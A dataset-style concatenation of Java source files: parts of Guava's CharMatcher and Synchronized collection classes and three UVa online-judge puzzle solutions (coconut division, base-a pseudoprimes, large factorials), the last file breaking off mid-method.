int length = sequence.length();
checkPositionIndex(start, length);
return (start == length) ? -1 : start;
}
@Override
public int lastIndexIn(CharSequence sequence) {
return sequence.length() - 1;
}
@Override
public boolean matchesAllOf(CharSequence sequence) {
checkNotNull(sequence);
return true;
}
@Override
public boolean matchesNoneOf(CharSequence sequence) {
return sequence.length() == 0;
}
@Override
public String removeFrom(CharSequence sequence) {
checkNotNull(sequence);
return "";
}
@Override
public String replaceFrom(CharSequence sequence, char replacement) {
char[] array = new char[sequence.length()];
Arrays.fill(array, replacement);
return new String(array);
}
@Override
public String replaceFrom(CharSequence sequence, CharSequence replacement) {
StringBuilder result = new StringBuilder(sequence.length() * replacement.length());
for (int i = 0; i < sequence.length(); i++) {
result.append(replacement);
}
return result.toString();
}
@Override
public String collapseFrom(CharSequence sequence, char replacement) {
return (sequence.length() == 0) ? "" : String.valueOf(replacement);
}
@Override
public String trimFrom(CharSequence sequence) {
checkNotNull(sequence);
return "";
}
@Override
public int countIn(CharSequence sequence) {
return sequence.length();
}
@Override
public CharMatcher and(CharMatcher other) {
return checkNotNull(other);
}
@Override
public CharMatcher or(CharMatcher other) {
checkNotNull(other);
return this;
}
@Override
public CharMatcher negate() {
return none();
}
}
/** Implementation of {@link #none()}. */
private static final class None extends NamedFastMatcher {
static final CharMatcher INSTANCE = new None();
private None() {
super("CharMatcher.none()");
}
@Override
public boolean matches(char c) {
return false;
}
@Override
public int indexIn(CharSequence sequence) {
checkNotNull(sequence);
return -1;
}
@Override
public int indexIn(CharSequence sequence, int start) {
int length = sequence.length();
checkPositionIndex(start, length);
return -1;
}
@Override
public int lastIndexIn(CharSequence sequence) {
checkNotNull(sequence);
return -1;
}
@Override
public boolean matchesAllOf(CharSequence sequence) {
return sequence.length() == 0;
}
@Override
public boolean matchesNoneOf(CharSequence sequence) {
checkNotNull(sequence);
return true;
}
@Override
public String removeFrom(CharSequence sequence) {
return sequence.toString();
}
@Override
public String replaceFrom(CharSequence sequence, char replacement) {
return sequence.toString();
}
@Override
public String replaceFrom(CharSequence sequence, CharSequence replacement) {
checkNotNull(replacement);
return sequence.toString();
}
@Override
public String collapseFrom(CharSequence sequence, char replacement) {
return sequence.toString();
}
@Override
public String trimFrom(CharSequence sequence) {
return sequence.toString();
}
@Override
public String trimLeadingFrom(CharSequence sequence) {
return sequence.toString();
}
@Override
public String trimTrailingFrom(CharSequence sequence) {
return sequence.toString();
}
@Override
public int countIn(CharSequence sequence) {
checkNotNull(sequence);
return 0;
}
@Override
public CharMatcher and(CharMatcher other) {
checkNotNull(other);
return this;
}
@Override
public CharMatcher or(CharMatcher other) {
return checkNotNull(other);
}
@Override
public CharMatcher negate() {
return any();
}
}
/** Implementation of {@link #whitespace()}. */
@VisibleForTesting
static final class Whitespace extends NamedFastMatcher {
// TABLE is a precomputed hashset of whitespace characters. MULTIPLIER serves as a hash function
// whose key property is that it maps 25 characters into the 32-slot table without collision.
// Basically this is an opportunistic fast implementation as opposed to "good code". For most
// other use-cases, the reduction in readability isn't worth it.
static final String TABLE =
"\u2002\u3000\r\u0085\u200A\u2005\u2000\u3000"
+ "\u2029\u000B\u3000\u2008\u2003\u205F\u3000\u1680"
+ "\u0009\u0020\u2006\u2001\u202F\u00A0\u000C\u2009"
+ "\u3000\u2004\u3000\u3000\u2028\n\u2007\u3000";
static final int MULTIPLIER = 1682554634;
static final int SHIFT = Integer.numberOfLeadingZeros(TABLE.length() - 1);
static final CharMatcher INSTANCE = new Whitespace();
Whitespace() {
super("CharMatcher.whitespace()");
}
@Override
public boolean matches(char c) {
return TABLE.charAt((MULTIPLIER * c) >>> SHIFT) == c;
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
for (int i = 0; i < TABLE.length(); i++) {
table.set(TABLE.charAt(i));
}
}
}
/** Implementation of {@link #breakingWhitespace()}. */
private static final class BreakingWhitespace extends CharMatcher {
static final CharMatcher INSTANCE = new BreakingWhitespace();
@Override
public boolean matches(char c) {
switch (c) {
case '\t':
case '\n':
case '\013':
case '\f':
case '\r':
case ' ':
case '\u0085':
case '\u1680':
case '\u2028':
case '\u2029':
case '\u205f':
case '\u3000':
return true;
case '\u2007':
return false;
default:
return c >= '\u2000' && c <= '\u200a';
}
}
@Override
public String toString() {
return "CharMatcher.breakingWhitespace()";
}
}
/** Implementation of {@link #ascii()}. */
private static final class Ascii extends NamedFastMatcher {
static final CharMatcher INSTANCE = new Ascii();
Ascii() {
super("CharMatcher.ascii()");
}
@Override
public boolean matches(char c) {
return c <= '\u007f';
}
}
/** Implementation that matches characters that fall within multiple ranges. */
private static class RangesMatcher extends CharMatcher {
private final String description;
private final char[] rangeStarts;
private final char[] rangeEnds;
RangesMatcher(String description, char[] rangeStarts, char[] rangeEnds) {
this.description = description;
this.rangeStarts = rangeStarts;
this.rangeEnds = rangeEnds;
checkArgument(rangeStarts.length == rangeEnds.length);
for (int i = 0; i < rangeStarts.length; i++) {
checkArgument(rangeStarts[i] <= rangeEnds[i]);
if (i + 1 < rangeStarts.length) {
checkArgument(rangeEnds[i] < rangeStarts[i + 1]);
}
}
}
@Override
public boolean matches(char c) {
int index = Arrays.binarySearch(rangeStarts, c);
if (index >= 0) {
return true;
} else {
index = ~index - 1;
return index >= 0 && c <= rangeEnds[index];
}
}
@Override
public String toString() {
return description;
}
}
/** Implementation of {@link #digit()}. */
private static final class Digit extends RangesMatcher {
// Plug the following UnicodeSet pattern into
// https://unicode.org/cldr/utility/list-unicodeset.jsp
// [[:Nd:]&[:nv=0:]&[\u0000-\uFFFF]]
// and get the zeroes from there.
// Must be in ascending order.
private static final String ZEROES =
"0\u0660\u06f0\u07c0\u0966\u09e6\u0a66\u0ae6\u0b66\u0be6\u0c66\u0ce6\u0d66\u0de6"
+ "\u0e50\u0ed0\u0f20\u1040\u1090\u17e0\u1810\u1946\u19d0\u1a80\u1a90\u1b50\u1bb0"
+ "\u1c40\u1c50\ua620\ua8d0\ua900\ua9d0\ua9f0\uaa50\uabf0\uff10";
private static char[] zeroes() {
return ZEROES.toCharArray();
}
private static char[] nines() {
char[] nines = new char[ZEROES.length()];
for (int i = 0; i < ZEROES.length(); i++) {
nines[i] = (char) (ZEROES.charAt(i) + 9);
}
return nines;
}
static final CharMatcher INSTANCE = new Digit();
private Digit() {
super("CharMatcher.digit()", zeroes(), nines());
}
}
/** Implementation of {@link #javaDigit()}. */
private static final class JavaDigit extends CharMatcher {
static final CharMatcher INSTANCE = new JavaDigit();
@Override
public boolean matches(char c) {
return Character.isDigit(c);
}
@Override
public String toString() {
return "CharMatcher.javaDigit()";
}
}
/** Implementation of {@link #javaLetter()}. */
private static final class JavaLetter extends CharMatcher {
static final CharMatcher INSTANCE = new JavaLetter();
@Override
public boolean matches(char c) {
return Character.isLetter(c);
}
@Override
public String toString() {
return "CharMatcher.javaLetter()";
}
}
/** Implementation of {@link #javaLetterOrDigit()}. */
private static final class JavaLetterOrDigit extends CharMatcher {
static final CharMatcher INSTANCE = new JavaLetterOrDigit();
@Override
public boolean matches(char c) {
return Character.isLetterOrDigit(c);
}
@Override
public String toString() {
return "CharMatcher.javaLetterOrDigit()";
}
}
/** Implementation of {@link #javaUpperCase()}. */
private static final class JavaUpperCase extends CharMatcher {
static final CharMatcher INSTANCE = new JavaUpperCase();
@Override
public boolean matches(char c) {
return Character.isUpperCase(c);
}
@Override
public String toString() {
return "CharMatcher.javaUpperCase()";
}
}
/** Implementation of {@link #javaLowerCase()}. */
private static final class JavaLowerCase extends CharMatcher {
static final CharMatcher INSTANCE = new JavaLowerCase();
@Override
public boolean matches(char c) {
return Character.isLowerCase(c);
}
@Override
public String toString() {
return "CharMatcher.javaLowerCase()";
}
}
/** Implementation of {@link #javaIsoControl()}. */
private static final class JavaIsoControl extends NamedFastMatcher {
static final CharMatcher INSTANCE = new JavaIsoControl();
private JavaIsoControl() {
super("CharMatcher.javaIsoControl()");
}
@Override
public boolean matches(char c) {
return c <= '\u001f' || (c >= '\u007f' && c <= '\u009f');
}
}
/** Implementation of {@link #invisible()}. */
private static final class Invisible extends RangesMatcher {
// Plug the following UnicodeSet pattern into
// https://unicode.org/cldr/utility/list-unicodeset.jsp
// [[[:Zs:][:Zl:][:Zp:][:Cc:][:Cf:][:Cs:][:Co:]]&[\u0000-\uFFFF]]
// with the "Abbreviate" option, and get the ranges from there.
private static final String RANGE_STARTS =
"\u0000\u007f\u00ad\u0600\u061c\u06dd\u070f\u0890\u08e2\u1680\u180e\u2000\u2028\u205f\u2066"
+ "\u3000\ud800\ufeff\ufff9";
private static final String RANGE_ENDS = // inclusive ends
"\u0020\u00a0\u00ad\u0605\u061c\u06dd\u070f\u0891\u08e2\u1680\u180e\u200f\u202f\u2064\u206f"
+ "\u3000\uf8ff\ufeff\ufffb";
static final CharMatcher INSTANCE = new Invisible();
private Invisible() {
super("CharMatcher.invisible()", RANGE_STARTS.toCharArray(), RANGE_ENDS.toCharArray());
}
}
/** Implementation of {@link #singleWidth()}. */
private static final class SingleWidth extends RangesMatcher {
static final CharMatcher INSTANCE = new SingleWidth();
private SingleWidth() {
super(
"CharMatcher.singleWidth()",
"\u0000\u05be\u05d0\u05f3\u0600\u0750\u0e00\u1e00\u2100\ufb50\ufe70\uff61".toCharArray(),
"\u04f9\u05be\u05ea\u05f4\u06ff\u077f\u0e7f\u20af\u213a\ufdff\ufeff\uffdc".toCharArray());
}
}
// Non-static factory implementation classes
/** Implementation of {@link #negate()}. */
private static class Negated extends CharMatcher {
final CharMatcher original;
Negated(CharMatcher original) {
this.original = checkNotNull(original);
}
@Override
public boolean matches(char c) {
return !original.matches(c);
}
@Override
public boolean matchesAllOf(CharSequence sequence) {
return original.matchesNoneOf(sequence);
}
@Override
public boolean matchesNoneOf(CharSequence sequence) {
return original.matchesAllOf(sequence);
}
@Override
public int countIn(CharSequence sequence) {
return sequence.length() - original.countIn(sequence);
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
BitSet tmp = new BitSet();
original.setBits(tmp);
tmp.flip(Character.MIN_VALUE, Character.MAX_VALUE + 1);
table.or(tmp);
}
@Override
public CharMatcher negate() {
return original;
}
@Override
public String toString() {
return original + ".negate()";
}
}
/** Implementation of {@link #and(CharMatcher)}. */
private static final class And extends CharMatcher {
final CharMatcher first;
final CharMatcher second;
And(CharMatcher a, CharMatcher b) {
first = checkNotNull(a);
second = checkNotNull(b);
}
@Override
public boolean matches(char c) {
return first.matches(c) && second.matches(c);
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
BitSet tmp1 = new BitSet();
first.setBits(tmp1);
BitSet tmp2 = new BitSet();
second.setBits(tmp2);
tmp1.and(tmp2);
table.or(tmp1);
}
@Override
public String toString() {
return "CharMatcher.and(" + first + ", " + second + ")";
}
}
/** Implementation of {@link #or(CharMatcher)}. */
private static final class Or extends CharMatcher {
final CharMatcher first;
final CharMatcher second;
Or(CharMatcher a, CharMatcher b) {
first = checkNotNull(a);
second = checkNotNull(b);
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
first.setBits(table);
second.setBits(table);
}
@Override
public boolean matches(char c) {
return first.matches(c) || second.matches(c);
}
@Override
public String toString() {
return "CharMatcher.or(" + first + ", " + second + ")";
}
}
// Static factory implementations
/** Implementation of {@link #is(char)}. */
private static final class Is extends FastMatcher {
private final char match;
Is(char match) {
this.match = match;
}
@Override
public boolean matches(char c) {
return c == match;
}
@Override
public String replaceFrom(CharSequence sequence, char replacement) {
return sequence.toString().replace(match, replacement);
}
@Override
public CharMatcher and(CharMatcher other) {
return other.matches(match) ? this : none();
}
@Override
public CharMatcher or(CharMatcher other) {
return other.matches(match) ? other : super.or(other);
}
@Override
public CharMatcher negate() {
return isNot(match);
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
table.set(match);
}
@Override
public String toString() {
return "CharMatcher.is('" + showCharacter(match) + "')";
}
}
/** Implementation of {@link #isNot(char)}. */
private static final class IsNot extends FastMatcher {
private final char match;
IsNot(char match) {
this.match = match;
}
@Override
public boolean matches(char c) {
return c != match;
}
@Override
public CharMatcher and(CharMatcher other) {
return other.matches(match) ? super.and(other) : other;
}
@Override
public CharMatcher or(CharMatcher other) {
return other.matches(match) ? any() : this;
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
table.set(0, match);
table.set(match + 1, Character.MAX_VALUE + 1);
}
@Override
public CharMatcher negate() {
return is(match);
}
@Override
public String toString() {
return "CharMatcher.isNot('" + showCharacter(match) + "')";
}
}
private static CharMatcher.IsEither isEither(char c1, char c2) {
return new CharMatcher.IsEither(c1, c2);
}
/** Implementation of {@link #anyOf(CharSequence)} for exactly two characters. */
private static final class IsEither extends FastMatcher {
private final char match1;
private final char match2;
IsEither(char match1, char match2) {
this.match1 = match1;
this.match2 = match2;
}
@Override
public boolean matches(char c) {
return c == match1 || c == match2;
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
table.set(match1);
table.set(match2);
}
@Override
public String toString() {
return "CharMatcher.anyOf(\"" + showCharacter(match1) + showCharacter(match2) + "\")";
}
}
/** Implementation of {@link #anyOf(CharSequence)} for three or more characters. */
private static final class AnyOf extends CharMatcher {
private final char[] chars;
public AnyOf(CharSequence chars) {
this.chars = chars.toString().toCharArray();
Arrays.sort(this.chars);
}
@Override
public boolean matches(char c) {
return Arrays.binarySearch(chars, c) >= 0;
}
@Override
@GwtIncompatible // used only from other GwtIncompatible code
void setBits(BitSet table) {
for (char c : chars) {
table.set(c);
}
}
@Override
public String toString() {
StringBuilder description = new StringBuilder("CharMatcher.anyOf(\"");
for (char c : chars) {
description.append(showCharacter(c));
}
description.append("\")");
return description.toString();
}
}
/** Implementation of {@link #inRange(char, char)}. */
private static final class InRange extends FastMatcher {
private final char startInclusive;
private final char endInclusive;
InRange(char startInclusive, char endInclusive) {
checkArgument(endInclusive >= startInclusive);
this.startInclusive = startInclusive;
this.endInclusive = endInclusive;
}
@Override
public boolean matches(char c) {
return startInclusive <= c && c <= endInclusive;
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
table.set(startInclusive, endInclusive + 1);
}
@Override
public String toString() {
return "CharMatcher.inRange('"
+ showCharacter(startInclusive)
+ "', '"
+ showCharacter(endInclusive)
+ "')";
}
}
/** Implementation of {@link #forPredicate(Predicate)}. */
private static final class ForPredicate extends CharMatcher {
private final Predicate<? super Character> predicate;
ForPredicate(Predicate<? super Character> predicate) {
this.predicate = checkNotNull(predicate);
}
@Override
public boolean matches(char c) {
return predicate.apply(c);
}
@SuppressWarnings("deprecation") // intentional; deprecation is for callers primarily
@Override
public boolean apply(Character character) {
return predicate.apply(checkNotNull(character));
}
@Override
public String toString() {
return "CharMatcher.forPredicate(" + predicate + ")";
}
}
}
| google/guava | android/guava/src/com/google/common/base/CharMatcher.java |
1,165 | /**
* The short story titled Coconuts, by Ben Ames Williams, appeared in the Saturday Evening Post on
* October 9, 1926. The story tells about five men and a monkey who were shipwrecked on an island.
* They spent the first night gathering coconuts. During the night, one man woke up and decided to take
* his share of the coconuts. He divided them into five piles. One coconut was left over so he gave it to
* the monkey, then hid his share and went back to sleep.
* Soon a second man woke up and did the same thing. After dividing the coconuts into five piles,
* one coconut was left over which he gave to the monkey. He then hid his share and went back to bed.
* The third, fourth, and fifth man followed exactly the same procedure. The next morning, after they
* all woke up, they divided the remaining coconuts into five equal shares. This time no coconuts were
* left over.
* An obvious question is “how many coconuts did they originally gather?” There are an infinite
* number of answers, but the lowest of these is 3,121. But that’s not our problem here.
* Suppose we turn the problem around. If we know the number of coconuts that were gathered, what
* is the maximum number of persons (and one monkey) that could have been shipwrecked if the same
* procedure could occur?
* Input
* The input will consist of a sequence of integers, each representing the number of coconuts gathered by
* a group of persons (and a monkey) that were shipwrecked. The sequence will be followed by a negative
* number.
* Output
* For each number of coconuts, determine the largest number of persons who could have participated in
* the procedure described above. Display the results similar to the manner shown below, in the Sample
* Output. There may be no solution for some of the input cases; if so, state that observation.
* Sample Input
* 25
* 30
* 3121
* -1
* Sample Output
* 25 coconuts, 3 people and 1 monkey
* 30 coconuts, no solution
* 3121 coconuts, 5 people and 1 monkey
*/
//https://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=557
import java.util.Scanner;
public class CoconutsRevisited {
public static void main(String[] args) {
Scanner input = new Scanner(System.in);
int i, rez, j;
boolean isValid;
while (true) {
isValid = false;
int num = input.nextInt();
if (num == -1) {
break;
}
for (i = (int) (Math.sqrt(num) + 1); i > 1; i--) {
rez = num;
for (j = 0; j < i && rez % i == 1; j++) {
rez = rez - rez / i - 1;
}
if (rez % i == 0 && i == j) {
isValid = true;
break;
}
}
if (isValid) {
System.out.println(num + " coconuts, " + i
+ " people and 1 monkey");
} else {
System.out.println(num + " coconuts, no solution");
}
}
}
}
| kdn251/interviews | uva/CoconutsRevisited.java |
1,167 | /**
* Fermat’s theorem states that for any
* prime number p and for any integer a > 1,
* a
* p == a (mod p). That is, if we raise a to
* the pth power and divide by p, the remainder
* is a. Some (but not very many) nonprime
* values of p, known as base-a pseudoprimes,
* have this property for some a.
* (And some, known as Carmichael Numbers,
* are base-a pseudoprimes for all a.)
* Given 2 < p ≤ 1, 000, 000, 000 and 1 <
* a < p, determine whether or not p is a
* base-a pseudoprime.
* Input
* Input contains several test cases followed by a line containing ‘0 0’. Each test case consists of a line
* containing p and a.
* Output
* For each test case, output ‘yes’ if p is a base-a pseudoprime; otherwise output ‘no’.
* Sample Input
* 3 2
* 10 3
* 341 2
* 341 3
* 1105 2
* 1105 3
* 0 0
* Sample Output
* no
* no
* yes
* no
* yes
* yes
*/
//https://uva.onlinejudge.org/index.php?option=onlinejudge&page=show_problem&problem=2262
import java.math.BigInteger;
import java.util.Scanner;
public class PseudoPrimeNumbers {
public static void main(String[] args) {
Scanner input = new Scanner(System.in);
while (true) {
int p = input.nextInt();
int a = input.nextInt();
if (a == 0 && p == 0) {
break;
}
BigInteger pAsBigInteger = new BigInteger(p + "");
BigInteger aAsBigInteger = new BigInteger(a + "");
String answer = "";
if (!pAsBigInteger.isProbablePrime(10)) {
BigInteger result = aAsBigInteger.modPow(pAsBigInteger,
pAsBigInteger);
if (result.equals(aAsBigInteger)) {
answer = "yes";
} else {
answer = "no";
}
} else {
answer = "no";
}
System.out.println(answer);
}
}
}
| kdn251/interviews | uva/PseudoPrimeNumbers.java |
1,170 | /**
* In these days you can more and more often happen to see programs which perform some useful calculations
* being executed rather then trivial screen savers. Some of them check the system message queue
* and in case of finding it empty (for examples somebody is editing a file and stays idle for some time)
* execute its own algorithm.
* As an examples we can give programs which calculate primary numbers.
* One can also imagine a program which calculates a factorial of given numbers. In this case it is not
* the time complexity of order O(n) which makes troubles, but the memory requirements. Considering
* the fact that 500! gives 1135-digit number. No standard, neither integer nor floating, data type is
* applicable here.
* Your task is to write a programs which calculates a factorial of a given number.
* Input
* Any number of lines, each containing value n for which you should provide value of n!
* Output
* 2 lines for each input case. First should contain value n followed by character ‘!’. The second should
* contain calculated value n!.
* Assumptions:
* • Value of a number n which factorial should be calculated of does not exceed 1000 (although 500!
* is the name of the problem, 500 is a small limit).
* • Mind that visually big number of case 4 is broken after 80 characters, but this is not the case in
* the real output file.
* Sample Input
* 10
* 30
* 50
* 100
* Sample Output
* 10!
* 3628800
* 30!
* 265252859812191058636308480000000
* 50!
* 30414093201713378043612608166064768844377641568960512000000000000
* 100!
* 93326215443944152681699238856266700490715968264381621468592963895217599993229915
* 608941463976156518286253697920827223758251185210916864000000000000000000000000
*/
//https://uva.onlinejudge.org/index.php?option=onlinejudge&Itemid=99999999&page=show_problem&category=&problem=564
import java.math.BigInteger;
import java.util.Scanner;
public class FiveHundredFactorial {
public static void main(String[] args) {
Scanner input = new Scanner(System.in);
while (input.hasNext()) {
int number = input.nextInt();
BigInteger product = BigInteger.ONE;
for (int i = 2; i < number + 1; i++) {
product = product.multiply(BigInteger.valueOf(i));
}
System.out.println(number + "!\n" + product);
}
}
}
| kdn251/interviews | uva/FiveHundredFactorial.java |
1,171 | /*
* Copyright (C) 2007 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.collect;
import static com.google.common.base.Preconditions.checkNotNull;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import com.google.common.annotations.J2ktIncompatible;
import com.google.common.annotations.VisibleForTesting;
import com.google.j2objc.annotations.RetainedWith;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.Collection;
import java.util.Comparator;
import java.util.Deque;
import java.util.Iterator;
import java.util.List;
import java.util.ListIterator;
import java.util.Map;
import java.util.NavigableMap;
import java.util.NavigableSet;
import java.util.Queue;
import java.util.RandomAccess;
import java.util.Set;
import java.util.SortedMap;
import java.util.SortedSet;
import javax.annotation.CheckForNull;
import org.checkerframework.checker.nullness.qual.Nullable;
/**
* Synchronized collection views. The returned synchronized collection views are serializable if the
* backing collection and the mutex are serializable.
*
* <p>If {@code null} is passed as the {@code mutex} parameter to any of this class's top-level
* methods or inner class constructors, the created object uses itself as the synchronization mutex.
*
* <p>This class should be used by other collection classes only.
*
* @author Mike Bostock
* @author Jared Levy
*/
@GwtCompatible(emulated = true)
@ElementTypesAreNonnullByDefault
/*
* I have decided not to bother adding @ParametricNullness annotations in this class. Adding them is
* a lot of busy work, and the annotation matters only when the APIs to be annotated are visible to
* Kotlin code. In this class, nothing is publicly visible (nor exposed indirectly through a
* publicly visible subclass), and I doubt any of our current or future Kotlin extensions for the
* package will refer to the class. Plus, @ParametricNullness is only a temporary workaround,
* anyway, so we just need to get by without the annotations here until Kotlin better understands
* our other nullness annotations.
*/
final class Synchronized {
private Synchronized() {}
static class SynchronizedObject implements Serializable {
final Object delegate;
final Object mutex;
SynchronizedObject(Object delegate, @CheckForNull Object mutex) {
this.delegate = checkNotNull(delegate);
this.mutex = (mutex == null) ? this : mutex;
}
Object delegate() {
return delegate;
}
// No equals and hashCode; see ForwardingObject for details.
@Override
public String toString() {
synchronized (mutex) {
return delegate.toString();
}
}
// Serialization invokes writeObject only when it's private.
// The SynchronizedObject subclasses don't need a writeObject method since
// they don't contain any non-transient member variables, while the
// following writeObject() handles the SynchronizedObject members.
@GwtIncompatible // java.io.ObjectOutputStream
@J2ktIncompatible
private void writeObject(ObjectOutputStream stream) throws IOException {
synchronized (mutex) {
stream.defaultWriteObject();
}
}
@GwtIncompatible // not needed in emulated source
@J2ktIncompatible
private static final long serialVersionUID = 0;
}
private static <E extends @Nullable Object> Collection<E> collection(
Collection<E> collection, @CheckForNull Object mutex) {
return new SynchronizedCollection<>(collection, mutex);
}
@VisibleForTesting
static class SynchronizedCollection<E extends @Nullable Object> extends SynchronizedObject
implements Collection<E> {
private SynchronizedCollection(Collection<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@SuppressWarnings("unchecked")
@Override
Collection<E> delegate() {
return (Collection<E>) super.delegate();
}
@Override
public boolean add(E e) {
synchronized (mutex) {
return delegate().add(e);
}
}
@Override
public boolean addAll(Collection<? extends E> c) {
synchronized (mutex) {
return delegate().addAll(c);
}
}
@Override
public void clear() {
synchronized (mutex) {
delegate().clear();
}
}
@Override
public boolean contains(@CheckForNull Object o) {
synchronized (mutex) {
return delegate().contains(o);
}
}
@Override
public boolean containsAll(Collection<?> c) {
synchronized (mutex) {
return delegate().containsAll(c);
}
}
@Override
public boolean isEmpty() {
synchronized (mutex) {
return delegate().isEmpty();
}
}
@Override
public Iterator<E> iterator() {
return delegate().iterator(); // manually synchronized
}
@Override
public boolean remove(@CheckForNull Object o) {
synchronized (mutex) {
return delegate().remove(o);
}
}
@Override
public boolean removeAll(Collection<?> c) {
synchronized (mutex) {
return delegate().removeAll(c);
}
}
@Override
public boolean retainAll(Collection<?> c) {
synchronized (mutex) {
return delegate().retainAll(c);
}
}
@Override
public int size() {
synchronized (mutex) {
return delegate().size();
}
}
@Override
public @Nullable Object[] toArray() {
synchronized (mutex) {
return delegate().toArray();
}
}
@Override
@SuppressWarnings("nullness") // b/192354773 in our checker affects toArray declarations
public <T extends @Nullable Object> T[] toArray(T[] a) {
synchronized (mutex) {
return delegate().toArray(a);
}
}
private static final long serialVersionUID = 0;
}
@VisibleForTesting
static <E extends @Nullable Object> Set<E> set(Set<E> set, @CheckForNull Object mutex) {
return new SynchronizedSet<>(set, mutex);
}
static class SynchronizedSet<E extends @Nullable Object> extends SynchronizedCollection<E>
implements Set<E> {
SynchronizedSet(Set<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
Set<E> delegate() {
return (Set<E>) super.delegate();
}
@Override
public boolean equals(@CheckForNull Object o) {
if (o == this) {
return true;
}
synchronized (mutex) {
return delegate().equals(o);
}
}
@Override
public int hashCode() {
synchronized (mutex) {
return delegate().hashCode();
}
}
private static final long serialVersionUID = 0;
}
private static <E extends @Nullable Object> SortedSet<E> sortedSet(
SortedSet<E> set, @CheckForNull Object mutex) {
return new SynchronizedSortedSet<>(set, mutex);
}
static class SynchronizedSortedSet<E extends @Nullable Object> extends SynchronizedSet<E>
implements SortedSet<E> {
SynchronizedSortedSet(SortedSet<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
SortedSet<E> delegate() {
return (SortedSet<E>) super.delegate();
}
@Override
@CheckForNull
public Comparator<? super E> comparator() {
synchronized (mutex) {
return delegate().comparator();
}
}
@Override
public SortedSet<E> subSet(E fromElement, E toElement) {
synchronized (mutex) {
return sortedSet(delegate().subSet(fromElement, toElement), mutex);
}
}
@Override
public SortedSet<E> headSet(E toElement) {
synchronized (mutex) {
return sortedSet(delegate().headSet(toElement), mutex);
}
}
@Override
public SortedSet<E> tailSet(E fromElement) {
synchronized (mutex) {
return sortedSet(delegate().tailSet(fromElement), mutex);
}
}
@Override
public E first() {
synchronized (mutex) {
return delegate().first();
}
}
@Override
public E last() {
synchronized (mutex) {
return delegate().last();
}
}
private static final long serialVersionUID = 0;
}
private static <E extends @Nullable Object> List<E> list(
List<E> list, @CheckForNull Object mutex) {
return (list instanceof RandomAccess)
? new SynchronizedRandomAccessList<E>(list, mutex)
: new SynchronizedList<E>(list, mutex);
}
static class SynchronizedList<E extends @Nullable Object> extends SynchronizedCollection<E>
implements List<E> {
SynchronizedList(List<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
List<E> delegate() {
return (List<E>) super.delegate();
}
@Override
public void add(int index, E element) {
synchronized (mutex) {
delegate().add(index, element);
}
}
@Override
public boolean addAll(int index, Collection<? extends E> c) {
synchronized (mutex) {
return delegate().addAll(index, c);
}
}
@Override
public E get(int index) {
synchronized (mutex) {
return delegate().get(index);
}
}
@Override
public int indexOf(@CheckForNull Object o) {
synchronized (mutex) {
return delegate().indexOf(o);
}
}
@Override
public int lastIndexOf(@CheckForNull Object o) {
synchronized (mutex) {
return delegate().lastIndexOf(o);
}
}
@Override
public ListIterator<E> listIterator() {
return delegate().listIterator(); // manually synchronized
}
@Override
public ListIterator<E> listIterator(int index) {
return delegate().listIterator(index); // manually synchronized
}
@Override
public E remove(int index) {
synchronized (mutex) {
return delegate().remove(index);
}
}
@Override
public E set(int index, E element) {
synchronized (mutex) {
return delegate().set(index, element);
}
}
@Override
public List<E> subList(int fromIndex, int toIndex) {
synchronized (mutex) {
return list(delegate().subList(fromIndex, toIndex), mutex);
}
}
@Override
public boolean equals(@CheckForNull Object o) {
if (o == this) {
return true;
}
synchronized (mutex) {
return delegate().equals(o);
}
}
@Override
public int hashCode() {
synchronized (mutex) {
return delegate().hashCode();
}
}
private static final long serialVersionUID = 0;
}
static final class SynchronizedRandomAccessList<E extends @Nullable Object>
extends SynchronizedList<E> implements RandomAccess {
SynchronizedRandomAccessList(List<E> list, @CheckForNull Object mutex) {
super(list, mutex);
}
private static final long serialVersionUID = 0;
}
static <E extends @Nullable Object> Multiset<E> multiset(
Multiset<E> multiset, @CheckForNull Object mutex) {
if (multiset instanceof SynchronizedMultiset || multiset instanceof ImmutableMultiset) {
return multiset;
}
return new SynchronizedMultiset<>(multiset, mutex);
}
static final class SynchronizedMultiset<E extends @Nullable Object>
extends SynchronizedCollection<E> implements Multiset<E> {
@CheckForNull transient Set<E> elementSet;
@CheckForNull transient Set<Multiset.Entry<E>> entrySet;
SynchronizedMultiset(Multiset<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
Multiset<E> delegate() {
return (Multiset<E>) super.delegate();
}
@Override
public int count(@CheckForNull Object o) {
synchronized (mutex) {
return delegate().count(o);
}
}
@Override
public int add(@ParametricNullness E e, int n) {
synchronized (mutex) {
return delegate().add(e, n);
}
}
@Override
public int remove(@CheckForNull Object o, int n) {
synchronized (mutex) {
return delegate().remove(o, n);
}
}
@Override
public int setCount(@ParametricNullness E element, int count) {
synchronized (mutex) {
return delegate().setCount(element, count);
}
}
@Override
public boolean setCount(@ParametricNullness E element, int oldCount, int newCount) {
synchronized (mutex) {
return delegate().setCount(element, oldCount, newCount);
}
}
@Override
public Set<E> elementSet() {
synchronized (mutex) {
if (elementSet == null) {
elementSet = typePreservingSet(delegate().elementSet(), mutex);
}
return elementSet;
}
}
@Override
public Set<Multiset.Entry<E>> entrySet() {
synchronized (mutex) {
